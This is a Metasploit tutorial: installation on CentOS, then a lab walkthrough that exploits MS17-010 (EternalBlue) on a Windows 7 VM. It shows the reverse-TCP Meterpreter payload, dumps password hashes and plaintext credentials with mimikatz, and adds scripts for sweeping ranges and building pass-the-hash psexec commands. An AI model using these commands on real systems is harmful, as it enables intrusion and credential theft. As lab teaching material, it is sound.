Metasploit
I. Installing Metasploit on CentOS

```bash
# Download and run the Metasploit omnibus installer
curl "https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb" > msfinstall && chmod 755 msfinstall && ./msfinstall
# Install the PostgreSQL client package
yum install postgresql -y
# Initialize the database configuration
cd /opt/metasploit-framework/embedded/framework/config/
mv database.yml.example database.yml
cd ../bin/
# Create a dedicated msf user: PostgreSQL's initdb will not run as root,
# so the database has to be initialized as an unprivileged user
useradd msf
su msf
sh msfdb init
# Copy the generated database config back into the framework's config
# directory (this needs write access there, i.e. root)
cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/
cd
# Start the console
msfconsole
```

Two things worth checking on the way through. The first step fetches a script from the master branch of the rapid7 repository and runs it as root, so read it (or pin a release) before executing it on anything other than a throwaway lab box. After the console starts, `db_status` should report a PostgreSQL connection; if it does not, the copied database.yml is the first place to look.
II. Common commands

- `show exploits` – list all available exploit modules
- `show auxiliary` – list all available auxiliary modules
- `show options` – show the options of the current module
- `show payloads` – show the payloads compatible with the current module
- `show targets` – show the target types the current module supports
- `search` – search for modules by keyword
- `info` – show detailed information about a module
- `use` – select a module to work with
- `back` – leave the current module
- `set`/`unset` – set/clear a parameter of the current module
- `setg`/`unsetg` – set/clear a global parameter that applies to all modules
- `save` – save the current settings so they are available the next time the console starts
III. A penetration test walkthrough

Overview: this walkthrough exploits MS17-010 on a Windows 7 target. Despite the common "buffer overflow" label, MS17-010 (EternalBlue) is an SMBv1 kernel pool corruption bug, as the module description below states, which is why the exploit grooms the non-paged pool before the overwrite.
Steps:
1. Identify the target OS version and open ports
2. Scan for the vulnerability
3. Exploit it
4. Dump password hashes, get a shell, remote desktop, and so on
Terminology:
exploit: the module that triggers the vulnerability to gain code execution on the target; its goal is to get onto the system.
payload: the code the exploit delivers and runs on the target once it succeeds (here a Meterpreter stager that calls back over reverse TCP); it provides the foothold for post-exploitation work such as privilege escalation and credential dumping.
1 Port scan and service fingerprinting

```
[root@localhost ~]# nmap -sV 192.168.110.128

Starting Nmap 6.40 ( http://nmap.org ) at 2020-03-31 16:13 CST
Nmap scan report for 192.168.110.128
Host is up (0.00091s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE     VERSION
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn
5357/tcp open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:0C:29:FA:1E:07 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
[root@localhost ~]# msfconsole
```

TCP 445 (SMB) open on a Windows host is the precondition for MS17-010; 135, 139 and 5357 are consistent with a Windows workstation.
2 Vulnerability scan

```
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                              Required  Description
   ----         ---------------                                                              --------  -----------
   CHECK_ARCH   true                                                                         no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                                         no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                                        no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                                          yes       The SMB service port (TCP)
   SMBDomain    .                                                                            no        The Windows domain to use for authentication
   SMBPass                                                                                   no        The password for the specified username
   SMBUser                                                                                   no        The username to authenticate as
   THREADS      1                                                                            yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.110.128
RHOSTS => 192.168.110.128
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.110.128:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.110.128:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The check is unauthenticated and non-destructive: it sends a malformed SMBv1 Trans2 request and treats the STATUS_INSUFF_SERVER_RESOURCES error (0xC0000205) that unpatched hosts return as the indicator, which is why the verdict is worded "likely". CHECK_DOPU is on by default, so the same run also reports hosts that already carry a DOUBLEPULSAR implant. THREADS is 1 here because there is one target; raise it when RHOSTS is a range.
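Sweeping a range rather than one host is the common case, and the console transcript above does not scale to that. The script below is an added example (not from the original post): it runs the same auxiliary/scanner/smb/smb_ms17_010 module non-interactively with `msfconsole -x`, then parses the module's result lines into a host list, separating hosts that are merely vulnerable from hosts where CHECK_DOPU found a DOUBLEPULSAR implant (an existing implant means the box was already compromised by someone else and belongs to incident response, not to another exploitation attempt). It assumes `msfconsole` is on PATH (the omnibus installer puts it under /opt/metasploit-framework/bin). The sample output it parses is constructed here, modelled on the run above; the 192.168.110.130 and .131 hosts in it are invented for the sample.

```shell
#!/usr/bin/env sh
# Added example: non-interactive MS17-010 sweep with Metasploit, plus a parser
# for the scanner's output. Assumes msfconsole is on PATH.
set -eu

# Run auxiliary/scanner/smb/smb_ms17_010 against a host, range or CIDR and exit.
# -q suppresses the banner, -x runs the ';'-separated console commands.
scan_ms17_010() {
  rhosts="$1"
  threads="${2:-16}"
  msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS ${rhosts}; set THREADS ${threads}; run; exit"
}

# Turn the module's [+] result lines into "<ip> <state>" lines.
# States: vulnerable, doublepulsar-implant, or both (comma separated).
parse_scan_output() {
  awk '
    /^\[[+]\] .* - Host is likely VULNERABLE to MS17-010/ { split($2, a, ":"); vuln[a[1]] = 1 }
    /^\[[+]\] .* - Host is likely INFECTED with DoublePulsar/ { split($2, a, ":"); dopu[a[1]] = 1 }
    END {
      for (h in vuln) printf "%s %s\n", h, ((h in dopu) ? "vulnerable,doublepulsar-implant" : "vulnerable")
      for (h in dopu) if (!(h in vuln)) printf "%s doublepulsar-implant\n", h
    }' | sort
}

# Hosts that can go to the exploit step: vulnerable and not already implanted.
exploitable_hosts() {
  awk '$2 == "vulnerable" { print $1 }'
}

# Constructed sample (not real scan output): the first line copies the result above,
# the other hosts are invented to exercise the implant and not-vulnerable branches.
SAMPLE_SCAN_OUTPUT='[+] 192.168.110.128:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[+] 192.168.110.130:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.110.130:445   - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), Lang: 0x409
[-] 192.168.110.131:445   - Host does NOT appear vulnerable.
[*] 192.168.110.0/24:445  - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed'

if [ $# -ge 1 ]; then
  # Real run: keep the raw log for the report, print the parsed verdicts.
  scan_ms17_010 "$1" "${2:-16}" | tee ms17_010_scan.log | parse_scan_output
else
  # No arguments: demonstrate the parser on the constructed sample.
  printf '%s\n' "$SAMPLE_SCAN_OUTPUT" | parse_scan_output
  printf -- '--- exploitable ---\n'
  printf '%s\n' "$SAMPLE_SCAN_OUTPUT" | parse_scan_output | exploitable_hosts
fi
```

Usage: `sh ms17_010_sweep.sh 192.168.110.0/24 32` scans the range with 32 threads and writes the raw module output to ms17_010_scan.log; with no arguments it only runs the parser over the constructed sample. The raw log is worth keeping because the module's OS string (the "Windows 7 Enterprise 7600 x64" part) is what decides which exploit target applies in the next step.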
3 Exploitation

Select the exploit, set the target, the 64-bit Meterpreter reverse-TCP payload and the attacker's address (LHOST must be reachable from the target), then run it. VERIFY_TARGET and VERIFY_ARCH stay enabled so the module refuses to fire against an OS or architecture its single target entry does not match; with a kernel exploit a mismatch tends to crash the host rather than fail cleanly.

```
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.110.128
RHOSTS => 192.168.110.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.110.100
LHOST => 192.168.110.100
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.110.100:4444
[*] 192.168.110.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.110.128:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.110.128:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.110.128:445 - Connecting to target for exploitation.
[+] 192.168.110.128:445 - Connection established for exploitation.
[+] 192.168.110.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.110.128:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.110.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.110.128:445 - 0x00000010  72 69 73 65 20 37 36 30 30                       rise 7600
[+] 192.168.110.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.110.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.110.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.110.128:445 - Starting non-paged pool grooming
[+] 192.168.110.128:445 - Sending SMBv2 buffers
[+] 192.168.110.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.110.128:445 - Sending final SMBv2 buffers.
[*] 192.168.110.128:445 - Sending last fragment of exploit packet!
[*] 192.168.110.128:445 - Receiving response from exploit packet
[+] 192.168.110.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.110.128:445 - Sending egg to corrupted connection.
[*] 192.168.110.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.110.128
[*] Meterpreter session 1 opened (192.168.110.100:4444 -> 192.168.110.128:49455) at 2020-03-31 16:25:08 +0800
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > sysinfo
Computer        : shwang-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
```

The module first re-runs the scanner as its check, then grooms the non-paged pool with SMBv2 buffers, frees an SMBv1 connection to open a hole next to them, and lands the overwrite there; the "egg" sent afterwards is the payload that becomes the Meterpreter stage. Because the code runs in the kernel, the resulting session is already SYSTEM (the mimikatz output in the next step confirms it). The module is ranked "average" for a reason: if the groom fails the target usually blue-screens, so on a box that must stay up, exploit/windows/smb/ms17_010_psexec from the search results above is the more stable choice when an accessible named pipe is available.
4 Dumping credentials and getting a shell

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:12d35f0721a3dbd4c76641e4112a2045:::
shwang:1001:aad3b435b51404eeaad3b435b51404ee:3e126da93e034356d4e8cc3e0dd24357:::

meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7600).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;303795  NTLM       shwang-PC     shwang            lm{ 2efa20e3ab44ec3048d7645cd4e30c86 }, ntlm{ 3e126da93e034356d4e8cc3e0dd24357 }
0;291907  NTLM       shwang-PC     shwang            lm{ 2efa20e3ab44ec3048d7645cd4e30c86 }, ntlm{ 3e126da93e034356d4e8cc3e0dd24357 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE     n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     WIN-862M07A16T1$  n.s. (Credentials KO)
0;49422   NTLM                                       n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     WIN-862M07A16T1$  n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User              Password
------    -------    ------        ----              --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     WIN-862M07A16T1$
0;49422   NTLM
0;999     NTLM       WORKGROUP     WIN-862M07A16T1$
0;303795  NTLM       shwang-PC     shwang            adminadmin
0;291907  NTLM       shwang-PC     shwang            adminadmin
```

Reading the output: hashdump lines are user:RID:LM hash:NT hash:::. The LM field is identical for every account because aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, which is what the SAM stores when LM hashes are disabled (the Windows 7 default), so only the NT hashes matter. Administrator and Guest hold 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password, consistent with accounts that are disabled and have never had a password set (Windows 7 ships with the built-in Administrator disabled). shwang's NT hash matches the ntlm{...} value mimikatz reads from LSASS, and the kerberos provider still yields the plaintext adminadmin because this unpatched Windows 7 keeps logon credentials in LSASS in a reversible form. The console warning is worth heeding: the mimikatz extension is the legacy one, and `load kiwi` followed by `creds_all` is the maintained equivalent.
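Two of the four NT hashes above are the empty-password value, and feeding those to a cracker or a pass-the-hash attempt wastes time. The script below is an added example (not from the original post): it triages hashdump output in pwdump format, flags blank-password accounts and LM hashes that are actually present, and prints the msfconsole commands for reusing a usable LM:NT pair with exploit/windows/smb/psexec, whose SMBPass option accepts a hash pair in place of a password. The sample input is the hashdump output above; the target address in the generated commands is the lab host from this post, and the payload choice in them is an assumption taken from the exploit step.

```shell
#!/usr/bin/env sh
# Added example: triage Meterpreter hashdump output and build pass-the-hash commands.
set -eu

# Well-known sentinel hashes
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'   # LM hash of an empty string (stored when LM storage is disabled)
EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of an empty password

# Read pwdump lines (user:rid:lm:nt:::) on stdin; print "user rid=<rid> <verdict> <lm>:<nt>".
triage_hashdump() {
  awk -F: -v empty_lm="$EMPTY_LM" -v empty_nt="$EMPTY_NT" '
    NF >= 4 && length($3) == 32 && length($4) == 32 {
      if ($4 == empty_nt)       verdict = "blank-password"              # nothing to crack or pass
      else if ($3 != empty_lm)  verdict = "pth-candidate,lm-present"    # real LM hash: crackable in minutes
      else                      verdict = "pth-candidate"
      printf "%s rid=%s %s %s:%s\n", $1, $2, verdict, $3, $4
    }'
}

# Print the msfconsole commands for a pass-the-hash login with exploit/windows/smb/psexec.
# Metasploit accepts "LM:NT" in SMBPass, so the NT hash is usable without cracking it.
psexec_pth_commands() {
  rhost="$1"; user="$2"; lm="$3"; nt="$4"
  printf 'use exploit/windows/smb/psexec\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s:%s\nset payload windows/x64/meterpreter/reverse_tcp\nrun\n' \
    "$rhost" "$user" "$lm" "$nt"
}

# Sample input: the hashdump lines from the session above.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:12d35f0721a3dbd4c76641e4112a2045:::
shwang:1001:aad3b435b51404eeaad3b435b51404ee:3e126da93e034356d4e8cc3e0dd24357:::'

# Demo: triage the sample, then emit psexec commands for every pth-candidate.
printf '%s\n' "$SAMPLE_HASHDUMP" | triage_hashdump
printf '%s\n' "$SAMPLE_HASHDUMP" | triage_hashdump | awk '$3 ~ /^pth-candidate/ { print $1, $4 }' |
  while read -r user pair; do
    printf -- '--- %s ---\n' "$user"
    psexec_pth_commands 192.168.110.128 "$user" "${pair%%:*}" "${pair#*:}"
  done
```

One caveat before relying on the generated commands against a workgroup Windows 7 host: psexec needs the ADMIN$ share and service-control rights, and UAC remote restrictions in their default state filter the network token of every local administrator except the built-in RID-500 account. So a pass-the-hash login as shwang can authenticate and still be refused admin access, while Administrator, the account that would be exempt, has no password here. In a domain, or with LocalAccountTokenFilterPolicy set, the same hash works directly.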
A plain command shell on the target is one command away from the Meterpreter prompt, and it inherits the session's SYSTEM privileges:

```
meterpreter > shell
Process 3388 created.
Channel 1 created.
Microsoft Windows [ 6.1.7600]
(c) 2009 Microsoft Corporation

C:\Windows\system32>dir
```